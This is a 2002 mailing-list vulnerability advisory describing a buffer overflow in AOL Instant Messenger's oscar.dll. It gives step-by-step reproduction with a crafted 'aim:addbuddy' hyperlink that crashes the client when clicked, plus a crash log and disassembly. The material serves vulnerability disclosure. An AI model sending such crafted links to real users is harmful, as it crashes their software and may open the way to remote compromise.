Vulnerability Development mailing list archives
AIM including the beta 4.8.2646 Local/Remote Buffer Oveflow
From: "Adonis.No.Spam" <adonis1 () videotron ca>
Date: Thu, 7 Mar 2002 07:23:25 -0500
.--------. / Bugs \ +-----------------------------------------------------------------------. : Affected : All versions of AIM including the beta 4.8.2646 : Type : Local/Remote Buffer Oveflow : Date : 29-02-2002 : Author : NtWaK0 & Recon @ www.SafeHack.com : +-----------------------------------------------------------------------. We think this was not reported. Nothing was found publicaly about this. +------------------. Crash of AIM Client \ +--------------------`--------------------------------------------------. : +-----------. : Disclaimer \ : +-------------`---------------------------------------------------------. The information in this advisory is believed to be true based on : experiments though it may be false. The opinions expressed in this : advisory and program are my own and NOT of any company. : In Fact I do not work for no one at the present time. : : This material is presented for informational and entertainment purposes : only, and to satisfy the curious. Any activities described in this file : which involve vandalism, theft, or any other illegal activities are : recounted from third-party conversations. I do not condone or encourage : vandalism or theft. I do not accept any liability for anything anyone : does with this information. : Remember: Use a computer in ways that ensure respect for your fellows. : : +-------------. : Brief History \ : +---------------`-------------------------------------------------------. If you are running any version of AIM (Aol Instant Messenger) you are : affected with this crash, vendor has been informed. : : AOL's Instant Messenger client (AIM) has contain a buffer overflow : vulnerability in the file oscar.dll. : Instant Messenger allows AOL users to send short messages between : its users. A buffer overflow in oscar.dll in al register. : : +---------------------------+ :
Test OS Applications <<< :
+---------------------------+ : Tested on all version of Microsoft Windows Family of OS with the latest : beta version of AIM 4.8.2646 : : +-----------. : The Problem \ : +-------------`---------------------------------------------------------. Normaly I do not use AIM. But a friend of mine "Recon" told me about a : strange problem he found. Since I am curiouse I did install AIM and done: some test to find out what was going on again thanks Recon. : : AOL's Instant Messenger client (AIM) has contain a buffer overflow : vulnerability in the file oscar.dll. : Instant Messenger allows AOL users to send short messages between : its users. A buffer overflow in oscar.dll in al register. : : The buffer Overflow will happen if you send a special crafted message to: an AIM user. : : : : To see the buffer Overflow do the following steps: : 1- Make sure you have AIM 4.8.2646 installed : 2- Open a new IM window and click the link button to setup a hyperlink : for your buddy. : 4- Input the exact text into the link : aim:addbuddy?screenname=12345678,12345678,12345678,12345678,12345678,: 12345678,12345678,12345678,12345678,12345678,12345678&groupname= : 12345678,12345678,12345678,12345678,12345678,12345678,12345678 : ,12345678,12345678,12345678, : : 5- The text can be anything as long as it meets the format of 8 : characters for each word to add as a screenname and a groupname, the : instances should be 11 for the screenname and 10 for the groupname : 6- A memory dump will occurs as soon as the hyperlink is clicked by : either side (You or your buddy). : : This was taken after the buffer overflow occured from Drwatson log : : function: o_strncpy : 1218b4f9 8b4508 mov eax,[ebp+0x8] ss:00c : 1218b4fc 3b450c cmp eax,[ebp+0xc] ss:00c : 1218b4ff 7419 jz LoadRendezvousString+0x39f6 ( : 1218b501 8a06 mov al,[esi] : 1218b503 8807 mov [edi],al : 1218b505 47 inc edi : 1218b506 ff4508 inc dword ptr [ebp+0x8] ss:00c : 1218b509 46 inc esi : 1218b50a 43 inc ebx : 1218b50b 8a06 mov al,[esi] : FAULT ->1218b50d 8807 mov [edi],al : 1218b50f 47 inc edi : 1218b510 ff4508 inc dword ptr [ebp+0x8] ss:00c : 1218b513 46 inc esi : 1218b514 43 inc ebx : 1218b515 803e00 cmp byte ptr [esi],0x0 : 1218b518 75cf jnz LoadRendezvousString+0x3bc5 ( : 1218b51a 8b4d0c mov ecx,[ebp+0xc] ss:00c : 1218b51d 3bf9 cmp edi,ecx : 1218b51f 7312 jnb OscoreUseCurrentAcceleratorTable+ : 1218b521 2bcf sub ecx,edi : 1218b523 33c0 xor eax,eax : : Below is a portion of the asm code for the file oscar.dll : =============================================== : .text:1218B4E9 loc_1218B4E9: ; CODE XREF: o_strncpy+61j : .text:1218B4E9 cmp edi, [ebp+lpsz] : .text:1218B4EC jnb short loc_1218B533 : .text:1218B4EE push esi ; lpsz : .text:1218B4EF call ds:CharNextA .text:1218B4F5 cmp eax, ebx .text:1218B4F7 jnz short loc_1218B50B .text:1218B4F9 mov eax, [ebp+arg_0] .text:1218B4FC cmp eax, [ebp+lpsz] .text:1218B4FF jz short loc_1218B51A .text:1218B501 mov al, [esi] .text:1218B503 mov [edi], al .text:1218B505 inc edi .text:1218B506 inc [ebp+arg_0] .text:1218B509 inc esi .text:1218B50A inc ebx =============================================== .text:1218B50B loc_1218B50B: ; CODE XREF: o_strncpy+40j .text:1218B50B mov al, [esi] .text:1218B50D mov [edi], al ; <<<---HERE IS THE P .text:1218B50F inc edi .text:1218B510 inc [ebp+arg_0] .text:1218B513 inc esi .text:1218B514 inc ebx .text:1218B515 cmp byte ptr [esi], 0 .text:1218B518 jnz short loc_1218B4E9 ================================================= .text:1218B51A loc_1218B51A: ; CODE XREF: o_s .text:1218B51A ; o_strncpy+48j .text:1218B51A mov ecx, [ebp+lpsz] .text:1218B51D cmp edi, ecx .text:1218B51F jnb short loc_1218B533 .text:1218B521 sub ecx, edi .text:1218B523 xor eax, eax .text:1218B525 mov edx, ecx .text:1218B527 shr ecx, 2 .text:1218B52A repe stosd .text:1218B52C mov ecx, edx .text:1218B52E and ecx, 3 .text:1218B531 repe stosb .text:1218B533 ================================================== : : : Here is the stack variables : =========================== : 00000000 s db 4 dup(?) : 00000004 r db 4 dup(?) : 00000008 arg_0 dd ? : 0000000C lpsz dd ? ; offset (FFFFFFFF) : 00000010 arg_8 dd ? : : This issue has not been tested on third party software that supports : the oscar protocol : : +------------. : The Solution \ : +--------------`--------------------------------------------------------. We could not located AIM email to send them this issue. : +-----------------------------------------------------------------------. ________________________________________________________________________ The only secure computer is one that's unplugged, locked in a safe, and buried 20 feet under the ground in a secret location... and i'm not even too sure about that one"--Dennis Huges, FBI. ____________________________________________________________.___________ Live Well Do Good www.SafeHack.com | Je Pense, Donc Je Suis \(|)/ I know I ain't perfect, but i'm 99 point 9 percent :) --(")-- RFCs are meant to be read and followedÂ…:) /`\ NtWaK0 ________________________________________________________________________ Connect yourself to the main computer and let me take you to a cybernetic ride. Are you connected to the right cybernet? If you are, finally you are connected to my brain. ________________________________________________________________________ -=- Use a computer in a ways that ensure respect for your fellow -=-
Current thread:
- AIM including the beta 4.8.2646 Local/Remote Buffer Oveflow Adonis.No.Spam (Mar 07)
- Re: AIM including the beta 4.8.2646 Local/Remote Buffer Oveflow Douglas Pichardo (Mar 08)
- <Possible follow-ups>
- RE: AIM including the beta 4.8.2646 Local/Remote Buffer Oveflow John Adair (Mar 07)